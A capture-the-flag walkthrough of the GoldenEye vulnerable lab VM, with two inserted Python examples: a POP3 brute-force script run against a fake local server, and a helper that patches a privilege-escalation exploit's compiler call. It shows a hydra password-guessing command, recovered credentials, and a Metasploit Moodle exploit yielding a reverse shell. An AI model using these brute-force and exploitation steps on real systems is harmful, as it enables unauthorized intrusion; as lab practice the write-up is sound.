
GoldenEye

Description ⤵️

💡 GoldenEye ⤵️

I recently got done creating an OSCP type vulnerable machine that is themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.

I’d rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there is a hint of CTF flavor.

I’ve created and validated on VMware and VirtualBox. You would not need any extra tools other than what is on Kali by default. Will need to be set up as Host-Only, and on VMware you may need to click “retry” if prompted, upon initially starting it up because of formatting.

Changelog: Beta - 2018-05-02; v1 - 2018-05-04

Let’s find the IP Address first »


IP : 10.0.2.20

Port Scan Results ➡️


OPEN PORTS >
25     smtp
80     http
55006  pop3
55007  pop3

Web Enumeration ⤵️


Let's check the source code →


After decoding the obfuscated string in the page's script, I got the password for boris →

boris : InvincibleHack3r

After logging in I got this →

Checking the source code of that page I got this →


I tried POP3 with these credentials but had no luck, so let's brute-force the POP3 password for the users found in the source →

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 10.0.2.20 -s 55007 pop3


boris : secret1!

Let's log in to the POP3 service now and see what we can find →

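The two POP3 steps above (the hydra brute force, then reading the mailbox by hand) as one added Python example. This is not code from the original post: it starts a throwaway POP3 server on 127.0.0.1 with a constructed mailbox so it runs offline, then does what hydra does for the pop3 module (one USER/PASS attempt per candidate, first +OK wins) and finally pulls every message the way a manual USER/PASS/STAT/RETR session does. The username boris and the password secret1! are from the post; the fake server, the wordlist and the message text are assumptions made for the demo.

```python
import poplib
import socket
import threading

# Constructed sample mailbox served by the fake server below; it is NOT the
# real mail found on the GoldenEye box.
SAMPLE_MESSAGES = [
    "From: root@ubuntu\r\n"
    "To: boris\r\n"
    "Subject: constructed test mail\r\n"
    "\r\n"
    "This is a constructed message for the demo.\r\n",
]


def _serve_session(conn, user, password, messages):
    """Speak a minimal POP3 dialect (USER/PASS/STAT/LIST/RETR/QUIT) on one connection."""
    rfile = conn.makefile("rb")

    def reply(line):
        conn.sendall(line.encode() + b"\r\n")

    reply("+OK POP3 server ready")
    authed, pending_user = False, None
    while True:
        raw = rfile.readline()
        if not raw:                      # client went away without QUIT
            break
        parts = raw.decode(errors="replace").strip().split(" ", 1)
        cmd = parts[0].upper()
        arg = parts[1] if len(parts) > 1 else ""
        if cmd == "USER":
            pending_user = arg
            reply("+OK")
        elif cmd == "PASS":
            authed = (pending_user == user and arg == password)
            reply("+OK Logged in." if authed else "-ERR [AUTH] Authentication failed.")
        elif cmd == "QUIT":
            reply("+OK Bye")
            break
        elif not authed:                 # everything else needs a login first
            reply("-ERR Unknown command.")
        elif cmd == "STAT":
            reply(f"+OK {len(messages)} {sum(len(m) for m in messages)}")
        elif cmd == "LIST":
            reply(f"+OK {len(messages)} messages:")
            for i, m in enumerate(messages, 1):
                reply(f"{i} {len(m)}")
            reply(".")
        elif cmd == "RETR" and arg.isdigit() and 1 <= int(arg) <= len(messages):
            body = messages[int(arg) - 1]
            reply(f"+OK {len(body)} octets")
            conn.sendall(body.encode())  # sample has no lines starting with '.', so no byte-stuffing needed
            reply(".")
        else:
            reply("-ERR Unknown command.")
    rfile.close()
    conn.close()


def start_fake_pop3_server(user, password, messages=SAMPLE_MESSAGES):
    """Start a throwaway POP3 server on 127.0.0.1 and return (host, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))           # port 0: let the OS pick a free port
    srv.listen(8)

    def accept_loop():
        while True:
            client, _ = srv.accept()
            _serve_session(client, user, password, messages)

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()


def brute_force_pop3(host, port, user, wordlist):
    """What hydra's pop3 module does: one login per candidate, first +OK wins."""
    for candidate in wordlist:
        client = poplib.POP3(host, port, timeout=5)
        try:
            client.user(user)
            client.pass_(candidate)      # raises error_proto on a -ERR reply
            return candidate
        except poplib.error_proto:
            continue                     # wrong password, try the next one
        finally:
            try:
                client.quit()
            except (poplib.error_proto, OSError):
                pass
    return None


def fetch_messages(host, port, user, password):
    """Log in and retrieve every message, as a manual USER/PASS/STAT/RETR session would."""
    client = poplib.POP3(host, port, timeout=5)
    client.user(user)
    client.pass_(password)
    count, _size = client.stat()
    mails = []
    for n in range(1, count + 1):
        _resp, lines, _octets = client.retr(n)
        mails.append(b"\n".join(lines).decode(errors="replace"))
    client.quit()
    return mails


if __name__ == "__main__":
    host, port = start_fake_pop3_server("boris", "secret1!")
    found = brute_force_pop3(host, port, "boris", ["password", "boris", "secret1!"])
    print("password found:", found)
    for mail in fetch_messages(host, port, "boris", found):
        print(mail)
```

Against the real box you would point `brute_force_pop3` and `fetch_messages` at 10.0.2.20:55007 instead of the fake server; note that a real Dovecot delays or drops the connection after failed logins, which is why hydra's `-f` (stop on first hit) and a short wordlist such as fasttrack.txt keep the run quick.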

Now let's get the password for the natalya user the same way →


natalya : bird

Let's try it out →


username: xenia
password: RCP90rulez!

Add severnaya-station.com to /etc/hosts (pointing at 10.0.2.20) so the site resolves.


Let's get the password for this user the same way →


doak : goat


username: dr_doak
password: 4England!

After logging in I got this file →


admin : xWinter1995x!

Here I will use Metasploit to exploit the vulnerable Moodle site through its spell-checker.


For the spell-checking exploit to work, I first have to set the spell engine option to PSpellShell in Moodle's settings and save it.


Now I set the payload to a Python reverse shell →


Now I get the reverse shell, because my payload is executed when the spell-checker function is called →


The OS here is very outdated, so let's find a local privilege-escalation exploit for it →


Since gcc is not present on the victim machine, I replaced it in the exploit source with cc, the traditional UNIX name for the C compiler, which is available there.
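The compiler swap described above as an added Python helper, not code from the original post: it checks which C compiler names exist on the target's PATH and rewrites the hard-coded gcc invocation in an exploit source to whichever one is present, leaving paths like /usr/bin/gcc and other words containing "gcc" alone. The sample source line is constructed for the demo (it is not the actual exploit file), the candidate list is an assumption, and `which` is injectable so the logic can be exercised without a real compiler installed.

```python
import re
import shutil

# Constructed stand-in for the line in a typical privesc exploit that shells
# out to the compiler; it is NOT the actual exploit source used on the box.
SAMPLE_EXPLOIT_SRC = (
    'lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");\n'
)

# Assumed order of preference; cc is the traditional UNIX name and is often
# present as a symlink or an alternative compiler when gcc itself is missing.
CANDIDATES = ("gcc", "cc", "clang", "tcc")


def pick_compiler(candidates=CANDIDATES, which=shutil.which):
    """Return the first compiler name found on PATH, or None if there is none.

    `which` is injectable so the selection can be tested without any compiler.
    """
    for name in candidates:
        if which(name):
            return name
    return None


def patch_compiler_calls(source, old, new):
    """Rewrite `old` wherever it appears as a bare command name.

    Occurrences inside a path (/usr/bin/gcc), as part of another word (gccx)
    or a versioned name (gcc-4.8) are left untouched.
    """
    pattern = r"(?<![\w./-])" + re.escape(old) + r"(?![\w.-])"
    return re.sub(pattern, new, source)


def prepare_exploit(source, which=shutil.which):
    """Pick an available compiler and rewrite hard-coded gcc calls to it.

    Returns (compiler, patched_source); raises if the target has no compiler,
    in which case the exploit must be compiled elsewhere and uploaded as a binary.
    """
    compiler = pick_compiler(which=which)
    if compiler is None:
        raise RuntimeError("no C compiler on target: compile elsewhere and upload the binary")
    if compiler != "gcc":
        source = patch_compiler_calls(source, "gcc", compiler)
    return compiler, source


if __name__ == "__main__":
    # Simulate the GoldenEye situation: cc is present, gcc is not.
    only_cc = lambda name: "/usr/bin/cc" if name == "cc" else None
    compiler, patched = prepare_exploit(SAMPLE_EXPLOIT_SRC, which=only_cc)
    print("using:", compiler)
    print(patched, end="")
```

When the exploit also contains a gcc call you run yourself (as opposed to one embedded in a `system()` string), the same compiler name must be used on the command line; if cc turns out to be a different compiler than gcc, expect different warning flags, which is why the sample line keeps `-w`.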

After transferring the exploit to the victim machine, let's compile and run it →


flag.txt → 568628e0d993b1973adc718237da6e93

If you have any questions or suggestions, please leave a comment below. Thank You !

This post is licensed under CC BY 4.0 by the author.